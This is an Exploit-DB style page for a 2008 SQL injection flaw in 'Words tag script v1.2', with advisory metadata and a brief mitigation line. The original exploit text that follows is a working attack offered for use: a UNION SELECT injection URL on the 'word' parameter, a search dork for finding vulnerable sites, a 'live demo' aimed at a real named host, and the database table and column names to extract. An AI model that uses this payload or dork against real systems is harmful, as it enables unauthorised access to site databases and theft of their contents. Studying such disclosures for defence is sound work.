Words tag script v1.2 (word) Remote SQL Injection Vulnerability

vendor:

Words tag script

by:

Hussin X

8.8

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Words tag script

Affected Version From: Words tag script v1.2 (word)

Affected Version To: Words tag script v1.2 (word)

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Words tag script v1.2 (word) Remote SQL Injection Vulnerability

A vulnerability exists in Words tag script v1.2 (word) which allows an attacker to inject arbitrary SQL commands via the 'word' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database, execute arbitrary commands on the server, or even gain access to the server itself.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Words tag script v1.2 (word) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://sourceworkshop.com/advanced_scripts/index.php?id=5
|
| DorK   : "Powered by words tag script"
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--






L!VE DEMO:
_________


http://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--


________________________

table_name : column_name

config_variables:variable_name
config_variables:value
config_variables:id
config_variables:title
config_variables:text
config_variables:description
_______________________


____________________________( Greetz )_________________________________
|
|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|  
|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________
 

                       Im IRAQi

# milw0rm.com [2008-08-31]